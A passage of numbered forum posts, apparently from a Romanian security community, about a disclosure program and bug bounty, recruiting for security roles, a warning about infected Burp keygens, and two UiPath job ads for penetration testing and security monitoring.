  18. Acela este "Vulnerability Disclosure Program", nu se plateste, dar se ofera reputatie HackerOne. Bug bounty e momentan privat (invite-only). Parca (nu ma ocup eu de el).
  19. Iti dau PM.
  20. Ca beneficii firma ofera tot ce v-ati putea dori. Ca pozitie, ar fi OK ca persoana sa fie senior si sa se poata descurca singura pe un proiect. Sunt multe aplicatii web, asta cred ca e cel mai important, dar si multe alte lucruri. PS: Avem si bug bounty daca sunt persoane interesate. Cine vrea sa stie mai multe, astept PM. Sau ne vedem la Defcamp.
  21. Mersi! Nu cred ca s-au schimbat prea multe, cred ca lucrurile sunt cam la fel. Da, o sa fim la Defcamp si anul acesta. @BiosHell - Din pacate nu, e nevoie de oameni cu experienta care sa primeasca un proiect si sa se descurce singuri.
  22. Nu stiu despre aceasta versiune, insa in trecut au existat astfel de keygen-uri pentru Burp infectate. Eu recomand sa dati 300 de EURO pe aplicatie, pentru ca merita.
  23. Da, de cateva luni.
  24. Accelerate Human Achievement: that is UiPath's purpose. We are the leader in Robotic Process Automation (RPA) and the highest-valued AI enterprise software company in the world. With over $568 million in funding from top venture capital firms like Accel, CapitalG, Kleiner Perkins, Sequoia, IVP, Madrona Venture Group, Meritech Capital & Coatue, we are on an unprecedented trajectory of growth. With this funding, we have an incredible opportunity to improve the way people work globally. Our award-winning company culture values humility, and leaders who know how to listen. CEO Daniel Dines’ primary goal was to build a company where he would love to work, and even now, with thousands of employees in tens of countries, that remains our top priority. We trust and empower our colleagues, and together we make sure we have everything we need to do our best work, from the support of strong leaders to awesome perks and benefits. UiPath is looking for a Penetration Tester to help and grow the security related operations within the fast-growing product teams across the company. This is a deeply technical role which implies developing and applying formal security centric assessments against existing and in-development UiPath products and features. The Pen Tester will analyze product functional and security requirements and use state of the art testing tools, or develop/automate new tools, as needed, to assess the security level provided. It will also assist in investigating security incidents. The Penetration Tester will work with Security Engineers, together with stakeholders, and is responsible of detailing and executing the testing plans and strategies, while also building clear and concise final reports. A successful Penetration Tester at UiPath is a self-starter, with strong analytical and problem-solving skills. Ability to maneuver in a fast-paced environment is critical, as well as handling ambiguity coupled with a deep understanding of various security threats. As a true owner of security in UiPath, great writing skills are needed, coupled with the ability to interact with stakeholders across multiple departments and teams. The Senior Penetration Tester acts as a mentor for technical peers and can transpose testing strategies and results in high level non-technical language. Here's What You Would Be Doing At UiPath Penetration testing & vulnerability research Developing automated security research tools Assist internal and external customers in investigating security incidents Recommendation of threat mitigations Security training and outreach to internal development teams Security guidance documentation Security tool development Security metrics delivery and improvements Assistance with recruiting activities What You Will Bring BS in Computer Science or related field, or equivalent work experience Minimum of 5 years of experience with vulnerability testing and auditing techniques Minimum of 3 year of experience in coding/scripting (Python,C,C++,x86/x64 assembly language) Good understanding of cyber-attack tools and techniques Experience writing POCs for discovered vulnerabilities Good knowledge of system and network security Advanced knowledge and understanding of security engineering, authentication and security protocols, cryptography, and application security Experience using various penetration testing tools (such as, BurpSuite, Metasploit, Nessus, etc.) Experience using debuggers, disassemblers for reverse engineering (Ida) Experience with forensics (preferably related to APTs) We are offering the possibility to work from home or flexible working hours, a competitive salary package, a Stock Options Plan and the unique opportunity of working with us to develop state-of-the-art robotics technology are just a few of the pluses. We must have caught your attention if you've read so far, so we should talk. At UiPath, we value a range of diverse backgrounds experiences and ideas. We pride ourselves on our diversity and inclusive workplace that provides equal opportunities to all persons regardless of race, color, religion, sex, sexual orientation, gender identity and expression, national origin, disability, military and/or veteran status, or any other protected classes. At UiPath, we value a range of diverse backgrounds experiences and ideas. We pride ourselves on our diversity and inclusive workplace that provides equal opportunities to all persons regardless of race, color, religion, sex, sexual orientation, gender identity and expression, national origin, disability, military and/or veteran status, or any other protected classes. Seniority Level Mid-Senior level Industry Information Technology & Services Computer Software Internet Employment Type Full-time Job Functions Linkedin: https://www.linkedin.com/jobs/view/1405924525/ Daca e cineva interesat, astept PM.
  25. Accelerate Human Achievement: that is UiPath's purpose. We are the leader in Robotic Process Automation (RPA) and the highest-valued AI enterprise software company in the world. With over $568 million in funding from top venture capital firms like Accel, CapitalG, Kleiner Perkins, Sequoia, IVP, Madrona Venture Group, Meritech Capital & Coatue, we are on an unprecedented trajectory of growth. With this funding, we have an incredible opportunity to improve the way people work globally. Our award-winning company culture values humility, and leaders who know how to listen. CEO Daniel Dines’ primary goal was to build a company where he would love to work, and even now, with thousands of employees in tens of countries, that remains our top priority. We trust and empower our colleagues, and together we make sure we have everything we need to do our best work, from the support of strong leaders to awesome perks and benefits. Come join us security team as an integral part of UiPath's product team. Collaborate with product managers, developers and legal department to understand UiPath’s external and internal security and privacy compliance requirements. Here's What You Would Be Doing At UiPath Bring your security monitoring experience to UiPath Build a security monitoring strategy and plan for UiPath hosted online services Collaborate with security engineers and penetration testers and incorporate their feedback into specific requirements for monitoring against advanced threats Identify opportunities to build scripts and tools that enable deeper insight into security state of our online servers Based on our service(s) components and architecture, define and build meaningful sources of security alerts that provide useful insight into the the security and compliance posture of UiPaths’ online environment Collaborate with development and IT teams in setting up and configuring the tools and systems needed to implement your monitoring strategy and plan Continuously enhance your monitoring strategy by staying on top of Changes in infrastructure and services running in UiPath online environment Innovation in tools provided by cloud service providers to detect and control threats Threat intelligence in the industry to identify potential threats applicable to UiPath online environment Bring your incident management experience to UiPath Analyze security alerts and turn them into actionable follow-up items through collaborative investigation and triage with development and IT teams Define incident response process and a playbook for stakeholders in development, IT and SRE teams Integrate security incident response process with existing tools for incident response in the company Build effective and actionable reports for development staff and management stakeholders What You Will Bring Proven track record (10+ years experience) in the security monitoring space, delivering meaningful results for a high volume, high complexity SaaS business Strong understanding and evidence of hands-on knowledge and experience in the following areas of security monitoring and incident response Security Monitoring Web application layer attacks and firewalls Denial of service attacks and cloud service providers native protections User and network level access control violations Phishing attacks File integrity monitoring Security configuration drift Security patch management Critical workload process monitoring User and system account compromise Incident Response Pre-Breach incident management table tops and drills Post-Breach incident management playbooks Stellar teamwork and collaboration skills. Proven track record of effectively working with remote teams Proven ability to wear multiple hats, prioritize, not get stuck, and adapt in an environment that’s growing and changing fast Prior experience with Azure Security Monitoring Prior experience with incident management toolset You’d be part of the strongest security and compliance management team in the world - we only hire the top 1% of the top 1%. Why to work with us? We are offering the possibility to work from home or flexible working hours, a competitive salary package, a Stock Options's Plan and the unique opportunity of working with us to develop state-of-the-art robotics technology are just a few of the pluses. We must have caught your attention if you've read so far, so we should talk. At UiPath, we value a range of diverse backgrounds experiences and ideas. We pride ourselves on our diversity and inclusive workplace that provides equal opportunities to all persons regardless of race, color, religion, sex, sexual orientation, gender identity and expression, national origin, disability, military and/or veteran status, or any other protected classes. At UiPath, we value a range of diverse backgrounds experiences and ideas. We pride ourselves on our diversity and inclusive workplace that provides equal opportunities to all persons regardless of race, color, religion, sex, sexual orientation, gender identity and expression, national origin, disability, military and/or veteran status, or any other protected classes. Seniority Level Mid-Senior level Industry Information Technology & Services Computer Software Internet Employment Type Full-time Job Functions Linkedin: https://www.linkedin.com/jobs/view/1405925374/ Daca e cineva interesat, astept PM.
×
×
  • Create New...